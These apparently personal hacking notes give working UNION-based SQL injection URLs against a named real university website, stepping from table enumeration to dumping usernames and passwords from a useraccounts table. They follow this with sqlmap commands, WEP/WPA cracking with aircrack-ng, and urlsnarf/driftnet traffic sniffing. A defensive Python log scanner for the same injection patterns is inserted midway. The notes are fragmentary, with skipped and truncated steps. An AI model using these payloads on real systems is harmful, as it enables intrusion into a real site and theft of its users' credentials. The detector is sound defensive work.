SQL CMD
~~~~~~~~~~~~~~~~~~~
Functions
database() || for finding the database name
version() || for finding the version of the db
user() || for finding the root user of the db
group_concat() || for collecting the different values into one result
http://www.bzu.edu.pk/departmentindex.php?id=-48'union select
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- -
http://www.bzu.edu.pk/departmentindex.php?id=-48'union select
1,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13,14,15 from
information_schema.table_constraints-- -
Step 6: Now finding the columns
http://www.bzu.edu.pk/departmentindex.php?id=-48'union select
1,2,3,4,5,6,group_concat(column_name),8,9,10,11,12,13,14,15 from
information_schema.columns where table_name='useraccounts'-- -
uname,upassword
0x3a = : (hex code for the colon, used as the separator)
http://www.bzu.edu.pk/departmentindex.php?id=-48'union select
1,2,3,4,5,6,group_concat(uname,0x3a,upassword),8,9,10,11,12,13,14,15 from
useraccounts-- -
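
A defender's view of the requests above, as an added example that is not part of the original notes: a Python check that scores web access-log lines for the UNION-based shapes these notes use (union select, numeric column padding, group_concat, information_schema, info functions, trailing `-- ` comment). The log lines, paths, addresses and the threshold of two indicators are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Indicators taken from the request shapes shown in the notes above.
INDICATORS = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "information_schema": re.compile(r"\binformation_schema\b"),
    "group_concat": re.compile(r"\bgroup_concat\s*\("),
    "info_function": re.compile(r"\b(?:database|version|user)\s*\(\s*\)"),
    "trailing_comment": re.compile(r"--(?:\s|$)"),
    "column_padding": re.compile(r"\bselect\s+(?:\d+\s*,\s*){3,}"),
}
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/[\d.]+"')

# Constructed sample log lines (hypothetical paths, documentation IP range).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /item.php?id=48 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [01/Jan/2024:10:00:05 +0000] "GET /item.php?id=-48\'union%20select%201,2,3,4,5,6,group_concat(table_name),8%20from%20information_schema.columns--%20- HTTP/1.1" 200 7400',
    '192.0.2.77 - - [01/Jan/2024:10:00:09 +0000] "GET /item.php?id=-1+union+select+1,version(),3--+- HTTP/1.1" 200 5300',
    '192.0.2.31 - - [01/Jan/2024:10:01:00 +0000] "GET /search.php?q=student+union+select+committee HTTP/1.1" 200 2100',
]

def normalize(query):
    """URL-decode, lowercase and collapse whitespace before matching."""
    return re.sub(r"\s+", " ", unquote_plus(query).lower())

def score_line(line):
    """Return (request_target, sorted indicator names), or None if unparsable."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    text = normalize(urlsplit(match.group(1)).query)
    return match.group(1), sorted(n for n, rx in INDICATORS.items() if rx.search(text))

def flag_requests(lines, threshold=2):
    """Keep requests that match at least `threshold` distinct indicators."""
    scored = [s for s in map(score_line, lines) if s]
    return [(target, hits) for target, hits in scored if len(hits) >= threshold]

if __name__ == "__main__":
    for target, hits in flag_requests(SAMPLE_LOG):
        print(hits, target)
```

Requiring two distinct indicators keeps the benign search for "student union select committee" out of the results while both injection-shaped requests are flagged.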
SQL Map
Assuming shu.co.in/lol.php?id=50
Check if the site is vulnerable or not
Step 1: sqlmap.py -u s.in/lol.php?id=50 --dbs //to find the database
assume database name is sh
alternative
or
Assuming sh.co.in/lol.php?id=50
Check if the site is vulnerable or not
alternative
or
Assuming .co.in/lol.php?id=50
Check if the site is vulnerable or not
Step 1: python sqlmap.py -u .co.in/lol.php?id=50 --dbs //to find the database
assume database name is sh
alternative
or
Wireless hacking
WI-FI
~~~~
~what is wi-fi?
~what is guided medium?
Data is transferred over a medium that is guided by a wire.
~what is unguided medium?
Data is transferred over an unguided (air) medium.
WEP
~~~
wireless equivalent privacy
airmon,airodump,aireplay,aircrack
WEP-CRACKING
~~~~~~~~~~
WPA
~~~
Steps 1-6: same as for WEP cracking
Step 7: aircrack-ng -w dc.txt shubham-01.cap
If an error occurs, use
--ignore-negative-one
Step 3: urlsnarf
e.g. urlsnarf -i wlan0
e.g. urlsnarf // for LAN (eth0 port)
Step 4: driftnet
e.g. driftnet -i wlan0
e.g. driftnet // for LAN (eth0 port)